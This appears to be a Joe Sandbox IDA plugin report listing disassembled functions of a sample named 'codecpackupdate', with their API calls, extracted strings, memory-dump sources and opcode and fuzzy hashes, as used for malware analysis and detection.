                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 3074076210-2104205924
                                                                          • Opcode ID: 550f082a58580fb72499b684be47a46c16d6476fde09130410b826262cc7a2fb
                                                                          • Instruction ID: 12fd7651247a4f79e6d985203b064b2a38fa40a1a5c0053cc2e1b9a8c1704b29
                                                                          • Opcode Fuzzy Hash: 550f082a58580fb72499b684be47a46c16d6476fde09130410b826262cc7a2fb
                                                                          • Instruction Fuzzy Hash: E0E0657194020EABDF10FF64ED05EEFBB7CAF04350F504555B814A55D1EF729B449690
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F37B1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F37B6
                                                                          • __localtime64.LIBCMT ref: 009F37C1
                                                                            • Part of subcall function 00A02540: __gmtime64_s.LIBCMT ref: 00A02553
                                                                          • std::exception::exception.LIBCMT ref: 009F37D9
                                                                            • Part of subcall function 00A02413: std::exception::_Copy_str.LIBCMT ref: 00A0242C
                                                                            • Part of subcall function 009FA45B: __EH_prolog.LIBCMT ref: 009FA460
                                                                            • Part of subcall function 009FA45B: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009FA46F
                                                                            • Part of subcall function 009FA45B: __CxxThrowException@8.LIBCMT ref: 009FA48E
                                                                          Strings
                                                                          • could not convert calendar time to UTC time, xrefs: 009F37CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                          • String ID: could not convert calendar time to UTC time
                                                                          • API String ID: 1963798777-2088861013
                                                                          • Opcode ID: f1c9cfae941f773d90b04e003e748bac4effbb57fb06577e0ffa5e323fbae2bc
                                                                          • Instruction ID: 8f27fea0cfcb079070aa3e668a3d33c52b9211185e703504602985b79ed5cc83
                                                                          • Opcode Fuzzy Hash: f1c9cfae941f773d90b04e003e748bac4effbb57fb06577e0ffa5e323fbae2bc
                                                                          • Instruction Fuzzy Hash: 1FE06DB1C0460EDACB00EFA0D9057FEB778EB04304F004569E825A2591EB7956468B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403B08 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
                                                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual$FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 714016831-0
                                                                          • Opcode ID: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                          • Instruction ID: 29c7c306398b504596bf767bafbbf3f0594b5aced9f79ae4ff8fd419923c464c
                                                                          • Opcode Fuzzy Hash: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                          • Instruction Fuzzy Hash: 6831F071A447019BE3208F24DD45B22BFB8EB44B5AF10813AE566BB3D1E778B9008B5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A0C329 Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AdjustPointer_memmove
                                                                          • String ID:
                                                                          • API String ID: 1721217611-0
                                                                          • Opcode ID: bcebf5ed13ebc7e78fcdd28f9cbbecee3214e199bbac3abee126ad2a332387f4
                                                                          • Instruction ID: d0f0504243a34483cf7d752f7c0ddbbcbf82b7aa99aca5115b19f19a5a3b60d8
                                                                          • Opcode Fuzzy Hash: bcebf5ed13ebc7e78fcdd28f9cbbecee3214e199bbac3abee126ad2a332387f4
                                                                          • Instruction Fuzzy Hash: B941F73720470B9BEB245F64F8E5B7A73A5AF41330F24851DF9458A1E2DB32E980DA11
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A01260 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,009F4149), ref: 00A012FF
                                                                            • Part of subcall function 009F3FDC: __EH_prolog.LIBCMT ref: 009F3FE1
                                                                            • Part of subcall function 009F3FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 009F3FF3
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00A012F4
                                                                          • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,009F4149), ref: 00A01340
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,009F4149), ref: 00A01411
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle$Event$CreateH_prolog
                                                                          • String ID:
                                                                          • API String ID: 2825413587-0
                                                                          • Opcode ID: 2b775c84c0b84f87df44828e81fb40b40cfca5ac2526a3287e98cf3ea145ab92
                                                                          • Instruction ID: cd68a1a27dfd8dfddb79fae1724a0ae12c49aa12a248cecdcc27330778b01dc6
                                                                          • Opcode Fuzzy Hash: 2b775c84c0b84f87df44828e81fb40b40cfca5ac2526a3287e98cf3ea145ab92
                                                                          • Instruction Fuzzy Hash: 36519F756043098BDB21DF28E8847DA77E4BF48328F194628F8699B3D1D735DD06CB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A036F0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          • Opcode ID: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                          • Instruction ID: 5cd3b693fbc4d06c2a81e7d1c1deb04f5b5af72d7fa21d4e0a53fb4252235f2d
                                                                          • Opcode Fuzzy Hash: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                          • Instruction Fuzzy Hash: 934162F6A0070DABDF28CF69E8845AA77B9AF44360B24856DF815866C0E770DE458B40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A0FE55 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A0FE8B
                                                                          • __isleadbyte_l.LIBCMT ref: 00A0FEB9
                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 00A0FEE7
                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 00A0FF1D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          • Opcode ID: f1627a2a55ce47f9aa07c8d5ad9233b878bf73ad84f17d161bdcf08d4cdf6407
                                                                          • Instruction ID: 6920d7bac4824e26bf36a071a7a11ccce81146912950c65335b210f56ee38c43
                                                                          • Opcode Fuzzy Hash: f1627a2a55ce47f9aa07c8d5ad9233b878bf73ad84f17d161bdcf08d4cdf6407
                                                                          • Instruction Fuzzy Hash: B431AC3160424AAFDB318F69E884AAA7BB9BF41310F154179F864A79E1E730A851DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F3D7E Relevance: 6.1, APIs: 4, Instructions: 57networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • htons.WS2_32(?), ref: 009F3DA2
                                                                            • Part of subcall function 009F3BD3: __EH_prolog.LIBCMT ref: 009F3BD8
                                                                            • Part of subcall function 009F3BD3: std::bad_exception::bad_exception.LIBCMT ref: 009F3BED
                                                                          • htonl.WS2_32(00000000), ref: 009F3DB9
                                                                          • htonl.WS2_32(00000000), ref: 009F3DC0
                                                                          • htons.WS2_32(?), ref: 009F3DD4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                          • String ID:
                                                                          • API String ID: 3882411702-0
                                                                          • Opcode ID: dacdbaf7652941782d8d2f48bf5f44902e137a1528ccc59faf8f0b08d9dc1419
                                                                          • Instruction ID: 9bb13a8ae143e5fc9d46e376b6319e64a18f4049abdc587adb48074add695cd0
                                                                          • Opcode Fuzzy Hash: dacdbaf7652941782d8d2f48bf5f44902e137a1528ccc59faf8f0b08d9dc1419
                                                                          • Instruction Fuzzy Hash: 7B118E35604209EFDF01DFA4D885AAAB7B8EF49310F00C456FD04DF251E6719A15C7A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F239D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 009F23D0
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009F23DE
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F2401
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009F2408
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 4018804020-0
                                                                          • Opcode ID: c1679828f12927259116af1bf0f410610bd20a8b0d0a4e4134ab493dd7615d99
                                                                          • Instruction ID: d2c349871b04428a83ab2b76d3cbd22c9e5640e7afc94e2aebfd0edf6d5938ed
                                                                          • Opcode Fuzzy Hash: c1679828f12927259116af1bf0f410610bd20a8b0d0a4e4134ab493dd7615d99
                                                                          • Instruction Fuzzy Hash: C9118E71600309ABDB10DFA0D984BBABBB9FF54715F10806DFA019B150E7B5ED42CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A0BC6D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___BuildCatchObject.LIBCMT ref: 00A0BC84
                                                                            • Part of subcall function 00A0C29B: ___AdjustPointer.LIBCMT ref: 00A0C2E4
                                                                          • _UnwindNestedFrames.LIBCMT ref: 00A0BC9B
                                                                          • ___FrameUnwindToState.LIBCMT ref: 00A0BCAD
                                                                          • CallCatchBlock.LIBCMT ref: 00A0BCD1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                          • String ID:
                                                                          • API String ID: 2633735394-0
                                                                          • Opcode ID: bf7e6a2e7c15418c5902c0973dae014681d9a77571f4c99d076f4f289f483f1c
                                                                          • Instruction ID: ba6cb13518905cd368df5ebb8e1aa462a1ca39d3120d45883cc5a390bef19151
                                                                          • Opcode Fuzzy Hash: bf7e6a2e7c15418c5902c0973dae014681d9a77571f4c99d076f4f289f483f1c
                                                                          • Instruction Fuzzy Hash: 2001133200010DFBDF126F95EE05EDA3BBAFF4D754F144114FA1866160D732E8A1ABA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A0C77B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                          • String ID:
                                                                          • API String ID: 3016257755-0
                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction ID: 0e2e55721218e754ba09281cd1d16a2d10b65982a381721811424d94000a2eeb
                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction Fuzzy Hash: 65011C7200014EBBCF126F84EC818EE3F76BB1C364B588615FA1899171D736C9B1AF81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F247D Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009F24A9
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009F24B8
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F24CD
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009F24D4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 4018804020-0
                                                                          • Opcode ID: 9de31386b93d06fd3510af487d68b7914b285347438d9de336d09c86038ebbc6
                                                                          • Instruction ID: 05126bf315fc3de9b666d203431d27ac4f9204f745f7f6dee6a21df540db330c
                                                                          • Opcode Fuzzy Hash: 9de31386b93d06fd3510af487d68b7914b285347438d9de336d09c86038ebbc6
                                                                          • Instruction Fuzzy Hash: A7F03C72204209AFDB00DFA9EC45F9ABBBCFF49711F008019FA05C7151D771E9518BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F2004 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F2009
                                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 009F2028
                                                                          • CloseHandle.KERNEL32(00000000), ref: 009F2037
                                                                          • CloseHandle.KERNEL32(00000000), ref: 009F204E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                          • String ID:
                                                                          • API String ID: 2456309408-0
                                                                          • Opcode ID: 48e50df62f72530a397d4918316017178ca1b576093bf96262e6a92601334b7f
                                                                          • Instruction ID: ebd51eb8b4fcd43a754d22be5a62d6bf261a16cf1fbe6821b6cf7cc4671e082e
                                                                          • Opcode Fuzzy Hash: 48e50df62f72530a397d4918316017178ca1b576093bf96262e6a92601334b7f
                                                                          • Instruction Fuzzy Hash: 81018172404708DBC728EFA4E9097EABBF8FF08744F04496DF546925A0CBB56945CF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F1E26 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Event$H_prologSleep
                                                                          • String ID:
                                                                          • API String ID: 1765829285-0
                                                                          • Opcode ID: 1fc2f14dd42b78f908443e5bee3db9d0b464cb7ea422af90c8f63acddd682d4a
                                                                          • Instruction ID: d01c02376367c48ac38f6d46b5680daf2fdf91e8814bd259909990c726f44505
                                                                          • Opcode Fuzzy Hash: 1fc2f14dd42b78f908443e5bee3db9d0b464cb7ea422af90c8f63acddd682d4a
                                                                          • Instruction Fuzzy Hash: BEF03A36644610EFCB00DFA4D888BCCBBB4FF4D322F1081A9FA1A9B291C7759944CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F9E88 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog_memmove
                                                                          • String ID: &'
                                                                          • API String ID: 3529519853-655172784
                                                                          • Opcode ID: 5d817f85562cd40d888fa1608dbfa007592d4ee99194438b3fd68e83e969d790
                                                                          • Instruction ID: e3549079a185746594a2fcc50cf39d6a16ebc65a3040d5fe24098bc9719c41eb
                                                                          • Opcode Fuzzy Hash: 5d817f85562cd40d888fa1608dbfa007592d4ee99194438b3fd68e83e969d790
                                                                          • Instruction Fuzzy Hash: 9E616D71D0021DDFDF20DFA4C981BEEBBB9AF84310F14416AE615AB191DB709E45CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004056B6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(?,00000000), ref: 004056CA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Info
                                                                          • String ID: $
                                                                          • API String ID: 1807457897-3032137957
                                                                          • Opcode ID: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                          • Instruction ID: 09f2f023d99f136d6c1d54f1ac7197ff319f79a86c6e1a8e0271cc1bcc75f35e
                                                                          • Opcode Fuzzy Hash: cf78403d1ad84891bd07750a5396902b39d4e3a867152e43ede0f354584f907c
                                                                          • Instruction Fuzzy Hash: 474156310047586AEB15D614DE5DBFB7FA9EB02700F1400F6E946F71D2C2790924DFAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F959C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,009F8306,?,?,00000000), ref: 009F9603
                                                                          • getsockname.WS2_32(?,?,?), ref: 009F9619
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastgetsockname
                                                                          • String ID: &'
                                                                          • API String ID: 566540725-655172784
                                                                          • Opcode ID: c3cba1759fe51b055d5a5b5be311e9bffc557db33e81f6e710bd545b356126a5
                                                                          • Instruction ID: ea05416dc2fe7bf5606affba7a4f4e27d78baaf38aff725df006844262fd4975
                                                                          • Opcode Fuzzy Hash: c3cba1759fe51b055d5a5b5be311e9bffc557db33e81f6e710bd545b356126a5
                                                                          • Instruction Fuzzy Hash: 9F2151B6A04208DFDB10DF68D845ADEB7F5FF4C324F11816AF918EB281D734A9458B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009FCBE2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009FCBE7
                                                                            • Part of subcall function 009FD1C3: std::exception::exception.LIBCMT ref: 009FD1F2
                                                                            • Part of subcall function 009FD979: __EH_prolog.LIBCMT ref: 009FD97E
                                                                            • Part of subcall function 00A03A8F: _malloc.LIBCMT ref: 00A03AA7
                                                                            • Part of subcall function 009FD222: __EH_prolog.LIBCMT ref: 009FD227
                                                                          Strings
                                                                          • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 009FCC24
                                                                          • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 009FCC1D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$_mallocstd::exception::exception
                                                                          • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                          • API String ID: 1953324306-1943798000
                                                                          • Opcode ID: 836d7793ae79bc07347c09127427de6f824681edda1d4f6186481f4a72d55f3c
                                                                          • Instruction ID: d300f6f8d0049d4f50e2d4434b0ababc3509f870f155d1cd1feea58348aabf67
                                                                          • Opcode Fuzzy Hash: 836d7793ae79bc07347c09127427de6f824681edda1d4f6186481f4a72d55f3c
                                                                          • Instruction Fuzzy Hash: A221CC71E0621CEADB14EBE8E955BFDBBB8AF54304F00401DF905AB281CB745A85CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009FCCD7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009FCCDC
                                                                            • Part of subcall function 009FD29A: std::exception::exception.LIBCMT ref: 009FD2C7
                                                                            • Part of subcall function 009FDAB0: __EH_prolog.LIBCMT ref: 009FDAB5
                                                                            • Part of subcall function 00A03A8F: _malloc.LIBCMT ref: 00A03AA7
                                                                            • Part of subcall function 009FD2F7: __EH_prolog.LIBCMT ref: 009FD2FC
                                                                          Strings
                                                                          • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 009FCD19
                                                                          • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 009FCD12
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$_mallocstd::exception::exception
                                                                          • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                          • API String ID: 1953324306-412195191
                                                                          • Opcode ID: 572be9ed19b01ccd30b0b89c9bd83918a22b60b802ddfc51126138686f59cc6b
                                                                          • Instruction ID: 33ba2f176dfec6b041bf34ad6ab784507167575642c8428f6a9fab1cb2c6441b
                                                                          • Opcode Fuzzy Hash: 572be9ed19b01ccd30b0b89c9bd83918a22b60b802ddfc51126138686f59cc6b
                                                                          • Instruction Fuzzy Hash: 4B218D71D052589ADB14EFE8D851BFDBBB8EF54300F00412DFA05AB291DBB49A45C791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F534D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 009F535D
                                                                            • Part of subcall function 00A02EEC: __FF_MSGBANNER.LIBCMT ref: 00A02F03
                                                                            • Part of subcall function 00A02EEC: __NMSG_WRITE.LIBCMT ref: 00A02F0A
                                                                            • Part of subcall function 00A02EEC: RtlAllocateHeap.NTDLL(008F0000,00000000,00000001), ref: 00A02F2F
                                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 009F536F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                          • String ID: \save.dat
                                                                          • API String ID: 4128168839-3580179773
                                                                          • Opcode ID: 6f7a8a38876fd0d215adc97b331dfd8e740ac3859c91477e3e4c830bcf2377a8
                                                                          • Instruction ID: 5445d399280768d5c660155a135afde97bdf17fdfdac98cecaad80d709d2af7e
                                                                          • Opcode Fuzzy Hash: 6f7a8a38876fd0d215adc97b331dfd8e740ac3859c91477e3e4c830bcf2377a8
                                                                          • Instruction Fuzzy Hash: ED117D325042487BDF218E699C819AFFF6FDF82790B1542A8F94467242D6E30D02C7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F3965 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F396A
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 009F39C1
                                                                            • Part of subcall function 009F1410: std::exception::exception.LIBCMT ref: 009F1428
